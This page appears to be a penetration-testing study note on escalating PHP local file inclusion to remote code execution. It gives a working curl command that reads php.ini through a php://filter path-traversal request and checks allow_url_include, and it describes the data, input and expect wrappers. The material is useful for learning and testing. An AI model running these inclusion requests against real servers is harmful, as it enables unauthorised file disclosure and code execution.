RCE

the php data wrapper can be used to include external data, including PHP code. this data wrapper can only be used in an attack if the "allow_url_include" setting is enabled in the PHP configurations.

METHOD 1: DATA WRAPPER

#read the PHP configuration file through the LFI vulnerability
root@oco:~$ curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
 <!DOCTYPE html>
  <html lang="en">
   ...SNIP...
   <h2>Containers</h2>W1BIUF0KCjs7Ozs7Ozs7O
   ...SNIP...4KO2ZmaS5wcmVsb2FkPQo=<p class="read-more">

 * configuration file default location
    - apache: /etc/php/{phpVersion}/apache2/php.ini
    - nginx: /etc/php/{phpVersion}/fpm/php.ini)
 
 * start with the latest PHP version and move to earlier versions to identify the version if necessary
    - the base64 filter must be used IOT not break the output
 
root@oco:~$ echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep allow_url_include
 allow_url_include = On
 
 * this option is not enabled by default, and is required for several other LFI attacks

METHOD 2: INPUT WRAPPER

similar to the data wrapper, the input wrapper can be used to include external input and execute PHP code. the main difference is that the input is passed as a POST request to input wrapper as opposed to the GET request used by the data wrapper. this wrapper also depends on the "allow_url_include" setting to be enabled and the vulnerable parameter must accept POST requests for this attack to work.

METHOD 3: EXPECT WRAPPER

the expect wrapper allows for commands to be directly run through URL streams. it works similarly to the previous web shells, but doesn't require an actual web shell as part of the command as it is designed to execute arbitrary commands. this is an external wrapper that needs to be manually installed and enabled on the back-end server

PreviousSOURCE CODE DISCLOSURENextFILE UPLOADS

Last updated